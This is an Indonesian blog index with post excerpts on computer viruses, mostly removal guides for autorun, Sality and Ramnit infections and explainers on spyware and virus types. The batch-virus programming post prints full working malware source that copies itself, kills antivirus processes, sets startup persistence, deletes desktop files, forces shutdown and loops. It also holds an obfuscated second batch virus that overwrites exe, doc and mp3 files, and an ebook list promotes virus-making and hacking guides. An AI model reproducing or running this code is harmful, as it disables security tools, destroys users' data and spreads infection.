Cara cepat menghapus virus autorun.inf

Setelah melalui perjalanan panjang untuk mengumpulkan data-data mengenai cara menghapus virus autorun.inf, akhirnya berakhir hari ini dengan hasil yang memuaskan. Virus autorun.inf sebenarnya dapat dihapus dengan menggunakan trik-trik sederhana seperti menghapus file induknya yang ada di drive C, nama filenya k4l0n6.sys.vbs, beberapa kombinasi trik-trik akan lebih baik dan sangat efektif untuk memberanas virus autorun.inf ini. Follow step dibawah ini untuk trik khusus menghapus virus autorun.inf.

Buka My Computer pilih Tools/Folder Options/unchecked hidden software, anda juga bisa menambahkan chek hidden file.Kemudian lihat di Root Directory (C), terlihat ada file “k4l0n6.sys.vbs”. Inilah file induk virus kalong tersebut.

• File “k4l0n6.sys.vbs” ini tidak dapat anda hapus sebelum anda menghapus file yang terkait dengan file ini.

• Buka dan pelajari virus tersebut cukup dengan Notepad atau text editor lainnya

• Jalankan Start/Run dan ketik REGEDIT, trus aapus file-file yang ada hubungannya ama virus kalong sebagai berikut.

Read More

Remove Virus Win32.Sector.2x (Virus Sality-Shortcut)

Virus Win32.Sector.2x adalah Virus Sality yang mempunyai metode penyebaran seperti virus shortcut yaitu dengan membuat file shortcut palsu, memanfaatkan celah keamanan .LNK (shortcut).

Gejala dan efek jika terinfeksi virus Win32.Sector.2x ini memang dapat kita ketahui, tapi untuk membersihkan virus sality-shortcut ini, terbilang tidak mudah.

Cara Pembersihan Virus Win32.Sector.2x (Remove Virus Sality-Shortcut)

1.  Putuskan koneksi jaringan/internet.

2.  Non-aktifkan program yang aktif pada start-up.

Lakukan langkah-langkah berikut :

• Klik Menu Start -> Run
• Ketik perintah pada kotak open : MSCONFIG , kemudian klik OK.
• Setelah muncul jendela “System Configuration Utility”, klik pada tab Startup.
• Pada tab startup, klik Disable All (untuk me-non aktifkan semua program yang aktif).
• Kemudian klik Apply, dan klik OK.
• Log-off komputer, kemudian login kembali (maka program pada startup tidak aktif).

Read More

Membersihkan Virus Copy of Shortcut to (1), (2), (3), (4)

Penjelasan :

Virus ini bagian dari Virus Sality yang cukup bisa membuat orang frustasi. Jenis virus ini menyebar melalui Flasdisk, Bluetooth, Memory card, dan hardware penyimpan data. Virus ini hanya menyerang Registry pada Local_Machine.

Pencegahan dan Pemusnahan :

Software yang diperlukan adalah SMADAV 8.4.1 untuk memperbaiki registry apabila terjadi kerusakan.

Tutorial :

Read More

Hapus dan Bersihkan Worms atau Virus W32 Ramnit B Copy Shortcut to (1), (2), (3), (4) lnk

Hari ini saya mendapatkan Worms atau Virus W32 Ramnit B di flashdisk saya (drive flash) 4 ekstensi file lnkCopy Shortcut untuk (1) lnk -... Copy Shortcut untuk (2) lnk - Copy Shortcut ke (3) lnk. - Copy Shortcut untuk (4). lnk. Aku mencoba Hapus file ini di flashdisk saya, tetapi worm atau virus Copy Shortcut untuk (1). Lnk dan lebih kembali lagi di flasdisk saya. Saya sudah mencoba beberapa anti virus tetapi tidak berhasil menghancurkan.

dan akhirnya aku Download Avira AntiVir Personal dan Smadav Ver 8.4 Memasang di PC saya.

Untuk download Avira dan smadav, mohon download dari link produk aslinya
www.avira.com dan www.smadav.net

Langkah 1. Install Avira antivirus. Selesai menginstal avira Pemindaian driver semua komputer Anda (saya mendapatkan Program infeksi cacing Lebih saya atau virus)

langkah 2. Instal Smadav Ver 8.4. Registry Scan Area.
Langkah 3. Retart komputer anda dan jalankan startup Antivirus Smadav dan Avira Antivir Personal (AntiVir Guard Posisi Activated).

Read More

Cara Membuat Virus Macro

(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)

Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.

Kali ini saya akan membahas mengenai virus macro… (para virus maker diharap untuk tenang dulu!).

Pasti banyak bertanya kenapa kali ini Morphic membahas tentang cara membuat virus? Biasanya kan Morphic lebih sering membahas analisis virus atau antivirusnya itu….

Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.

Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..

Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.

CARA MEMBUAT VIRUS MACRO

1. Buka Ms.Word (hanya contoh)
2. buka tools > Macro> Visual Basic Editor

• Akan muncul gambar di bawah

Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.

Read More

Pemrograman Virus Batch

Kali ini saya akan berikan sedikit ilmu bagaimana cara membuat virus batch. Dulu virus ini ngetren sekali (kira-kira tahun 90-an lah). Tapi sekarang ini saya jarang nemuin virus ini berkeliaran…

Virus batch dibuat di notepad dan disimpan dengan ekstensi ”.bat”. Ternyata selain virus VBS masih ada juga virus yang dibuat pake notepad. Yah salah satunya virus BAT (virus Batch).

Kalo kmu hidupkan file notepad kosong dengan ekstensi ”.bat”, yang muncul malah ”bla bla bla is not valid 32 application”
Itu artinya kita harus masukkan code virus ke dalam tubuh file bat itu.. he he he he….
Kali ini akan saya ajarkan kalian… tapi ingat saya tidak bertanggung jawab atas kecerobohan kalian…



Pertama sekali ketik:
@echo off

Yang itu memang mesti ditulis, supaya file tidak memunculkan seluruh command. Dan ini wajib (dianjurkan bozzz). Gak diketik begitu juga gak apa-apa sih sebenarnya…

Baru setelah itu kita ketik code-code virus lainnya… he he he

Ini contoh-contoh code-nya…

Untuk meng-kill process yang aktif:
Tskill AVGUARD

Perhatikan: untuk meng-kill process ketik ”tskill” lalu nama process-nya tapi tanpa ekstensi…
Contoh lain:
Tskill KAV

Untuk menghapus file:
del C:\Progra~1\Accessories\Ca
lc.EXE

Untuk menulis ke regedit:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Morphix /t REG_SZ /d %systemroot%\Morphix.bat /f

Untuk menampilkan messagebox
Msg * “Tulis pesanmu disini”

Dan masih banyak lagi contoh-contohnya….
Langsung aja neh salah satu virus batch :

@ECHO OFF
copy %0 %systemroot%\Morphix.bat > nul
copy %0 *.bat > nul
Attrib +h *.bat
cls
tskill AVGUARD
tskill AVGNT
tskill NMAIN
tskill KAV
tskill ad-aware
tskill av*
tskill PCMAV
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Mophix /t REG_SZ /d %systemroot%\Morphix.bat /f > nul
cls
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\Morphix.bat >> %systemroot%\win.ini
echo run=%systemroot%\Morphix.bat >> %systemroot%\win.ini
Attrib +h %systemroot%\win.ini
del C:\docume~\owner\Desktop
shutdown -s -t 15
msg * ”Karena sesuatu hal komputer ini harus di-shutdown… Ha ha ha”
cls
:Morphix
start %0
goto Morphix
::*Hanya untuk pembelajaran*

mau liat source batch yang lainnya???
Nih virus batch Rawut

@echo off
rem c0d3d by Vires @ palu city
rem If u wanna know how this worx
rem don’t follow the code from top to bottom
rem but follow the flow of code
rem is it beautiful???yes it is!!!!
rem vires18[at]yahoo[dot]com
rem (c)2007,Indonesia
rem Dedicated to my Girl:eltietien(did u knew her b 4???)
rem Greetz to all my friends
rem cyrus,bdhamas,sat_anichell,einstein2,wau^wau,the_g irl
rem xniffer, miyabi ,the_simpson,psycopath & all i forget
rem sorry!!!!!
goto v781i21r1212e23s4c5o677o85l
:n56a19m75a0101011
%res%%c00l% %gal%* %gal%bat
%l% pulangpalu
:t45e18g14a11l
%zhe% x=exe
%zhe% c=com
%zhe% fah=py
%l% v25i85r19e0s
:l08a80t19i85f08a19h
%zhe% sya=att
%zhe% gal=*.
%zhe% vi=fo
%sya%%res%%ah% %gal%* %s%
%zhe% ti=co
%l% t45e18g14a11l
:v25i85r19e0s
%zhe% d=txt
%zhe% la=do
%zhe% m=doc
%vi%%res% %%r %te% (%gal%%x% %gal%%c% %gal%%d% %gal%%m% %gal%%lgu%) %la% %ti%%fah% %0 “%%r”
%l% n56a19m75a0101011
:v18i17r16e15s
%zhe% s=-%vi%s -%vi%r -%vi%h
%zhe% res=r
%zhe% c00l=en
%l% l08a80t19i85f08a19h
:v781i21r1212e23s4c5o677o85l
set zhe=set
%zhe% te=in
%zhe% l=goto
%zhe% ah=ib
%zhe% lgu=mp3
%l% v18i17r16e15s
palucity
rem Heh,BATCH STILL BEAUTIFUL RIGHT????
rem (c)vires

Read More

Mengatasi Virus Sality

virus yang udah pernah tenar pada tahun 2003 kini kembali muncul dengan aksi yang lebih “Berbahaya “….dari sebelumnya virus ini dimasukkan kedalam kategory parasit abiz………..karena sasarannya file yang berekstensi exe…….. Salitiy menginfeksi setiap file yang berekstensi exe…………j Wal hasil ukuran file asli membengkak menjadi sekitar 20KB. Bagusnya lagi Salitiy meletakkan source code nya pada empty segmen pada file yang ditumpangi dan mengubah entry poit asli ke bangun awal tubunya sehingga yang pertama kali dijalankan adalah source code palsu dan terkadang membuat file induk menjadi korup. Pada umunya file induk langsung menutup diri sesaat dijalankan.

Penyebarannya bisa dibilang “unik” karena setelah menginfeksi suatu file EXE (PE), maka file yang baru terinfeksi tersebut yang akan meneruskan aksi virusnya dan begitu seterusnya akan mencari korban lainnya. Pada saat file yang terinfeksi di-kill, bukan mati aksinya tapi diambil alih oleh predecessor- nya.
Untuk itu ada cara yang aman untuk menghilangkan virus ini tanpa mendelete langsung, dan saya sarankan (berdasarkan pengalaman) menggunakan cara ini:

1. download rmsality, virus removal khusus untuk virus sality dari Grisoft (produsen AVG), berisi tiga file yang harus anda dowload ke dalam satu folder
2. download fileASSASSIN

===============================================
Langkah-langkah CARA NGATASINNYA...!!

1. Installkan dan jalankan fileASSASSIN dan arahkan / ketik di menu browsenya ke c:\windows\system32\wmdrtc32.dll delete file-nya di cheklist kemudian klik execute. ulangi untuk file yang kedua c:\windows\system32\wmdrtc32.dl_
2. jalankan program rmsality yang sudah di download dan biarkan melakukan proses scanning secara keseluruhan. setelah selesai anda akan mendapatkan beberapa file yang tidak bisa di clean (failed to clean) dan antivirus meminta anda untuk mereboot system. (anda juga bisa melakukan scanning per-drive dengan cara masuk ke menu run, kemudian ketik cmd, kemudian masuk ke direktori rmsality dimana anda menyimpannya, kemudian ketik contoh: rmsality c:
3. reboot system. untuk meyakinkan silahkan scan lagi dengan antivirus yang lain, seperti ANSAV, AVG dll

Read More

Spyware

Spyware merupakan program yang dibuat dengan tujuan untuk memata-matai (spy). SPYWARE bukanlah suatu ancaman biasa, namun bisa jadi sangat berbahaya karena sesuai dengan namanya, spyware sangat mengancam privasi dan bisa menurunkan kinerja suatu system&jaringan
Spyware telah merajalela sejak tahun 1994. Saat itu, SPYWARE yang cukup terkenal digunakan adalah Gator. Spyware ini masih exist sampai saat ini. Sejalan dengan perkembangan teknologi, semulanya spyware ditujukan untuk bisnis periklanan. Namun kini semua telah berubah, spyrware digunakan unuk tujuan destructive.

Kategori Spyware

----------------

SPYWARE memiliki beberapa kategori, yaitu:



Trojan / backdoor

Adware

Keylogger

DDoS agent (zombie)

Sniffer, password cracker

Browser Helper Object

P2P contohnya kazaa.

RAT – Remote Access Tool/Trojan.

Kalau kita lihat ada yang overlapping dengan solusi anti-virus yaitu di bagian trojan. Solusi anti-virus umumnya bisa mendeteksi keberadaan trojan di dalam sistem kita. Namun untuk kategori lain seperti adware, P2P, hacker tools, umumnya anti virus tidak memasukkan kategori ini di dalam deteksi mereka.
Lalu kenapa tool seperti sniffer digolongkan ke dalam spyware ??? Ada alasan di belakangnya. Sebagaimana kita ketahui bahwa tool sniffer bisa mempunyai dua sisi yaitu sisi yang baik atau berguna bagi administrator. Sniffer bisa digunakan oleh administrator untuk melakukan ‘tracing’ atau analisa paket di jaringan mereka. Network Load utility yang untuk mengetahui kapasitas bandwidth juga menggunakan teknologi sniffer. Tool IDS – Intrusion Detection System yang berbasis network juga menggunakan teknologi sniffer untuk mendeteksi adanya intrusion di satu jaringan.
Namun di sisi lain ternyata sniffer bisa digunakan untuk tujuan yang tidak baik misalnya untuk sniffing user-id dan password yang digunakan di suatu jaringan. Sehingga apabila sistem authentication yang ada tidak menggunakan enkripsi untuk password dan user-id atau berupa ‘plain-text’ maka sniffer dapat dengan mudah melihat user-id dan password tersebut.
Selain itu ada kategori spyware yang orang dengan senang hati untuk meng-installnya yaitu P2P – Point to Point software seperti contohnya adalah Kazaa – P2P untuk sharing file yang sangat populer. Di dalam Kazaa ini banyak sekali terdapat adware – software iklan – karena di situlah mereka mendapatkan profit. Kategori ini yang dimasukkan ke dalam ‘user awareness installation’ artinya user yang melakukan atau trigger instalasi sendiri bukan via embedded installation misalnya saat lakukan download atau akses ke Internet.

Well, selalu berhati-hatilah... ;)

Read More

Cara Kerja Virus Komputer Menurut Jenisnya

Virus merupakan suatu program komputer yang memiliki kemampuan untuk merusak file atau merusak sistem komputer.
Virus memiliki berbagai jenis dan mempunyai cara kerja yang berbeda-beda,

Berikut Jenis-jenis virus dan cara kerja masing-masing virus :

1. Virus File
Virus ini mempunyai cara kerja yaitu menginfeksi aplikasi atau dokumen yang ada dalam komputer anda.
Saat aplikasi yang terinfeksi tersebut dijalankan, maka virus ini akan menyebar dengan cara menginfeksi semua file atau dokumen yang diakses oleh aplikasi tersebut.

2. Virus Boot Sector
Virus ini mempunyai cara kerja yaitu menginfeksi boot sector harddisk (boot sector merupakan sebuah daerah dalam hardisk yang pertama kali diakses saat komputer dihidupkan).
Jika virus boot sector ini aktif, pengguna tidak akan bisa membooting komputernya secara normal.

3. Virus E-mail
Virus ini mempunyai cara kerja yaitu menyebar melalui e-mail (biasanya dalam bentuk file lampiran/attachment).
Virus memiliki ciri khusus berupa ekstensi .scr, .exe, .pif, atau .bat.
Apabila Virus ini aktif, maka dia akan mengirimkan dirinya sendiri ke berbagai alamat e-mail yang terdapat dalam buku alamat pengguna.

4. Virus Multipartite
Virus ini mempunyai cara kerja yaitu menginfeksi file-file komputer sekaligus boot sector pada harddisk.
Virus jenis ini akan menimbulkan banyak masalah karena menyebabkan kerusakan yang fatal.

5. Virus Polimorfis
Virus ini mempunyai cara kerja yang unik yaitu virus ini dapat mengubah kode dirinya (berganti wujud) saat menyebarkan diri ke komputer lain
Virus jenis lebih sulit dideteksi karena mempunyai sifat seperti itu..

6. Virus Siluman (stealth virus)
Virus ini mempunyai cara kerja yaitu dia mampu Menyembunyikan dirinya dengan cara membuat sebuah file yang terinfeksi seolah-olah file tersebut tidak terinfeksi.

7. Virus Makro
Virus ini mempunyai cara kerja yaitu menginfeksi Aplikasi Microsoft Office, seperti Word dan Excel.
Biasanya Dokumen yang terinfeksi oleh Virus Makro akan memodifikasi perintah yang ada di Microsoft Office seperti perintah “Save” untuk menyebarkan dirinya saat perintah tersebut dijalankan.

Read More

DOWNLOAD E-BOOK

Silakan Download E-book ini sepuasnya

Tidak ada larangan untuk menyebarkannya

Amankan Windows XP Anda!!!
Membuat flashdisk aman dari autorun-nya si-virus
Cara Mudah Membuat Virus dengan VB+Vimaker32
Tutorial How To Hack and Crack
Hack Registry
Kumpulan 97 Trik Registry
Mengatasi Virus Tanpa Antivirus
Panduan Ringkas Html
Teknik Enckripts Virus VBS
Menjadi Unix Hacker

Dari Sumber Lain

150 Trik Windows
152 Trik Regedit

Read More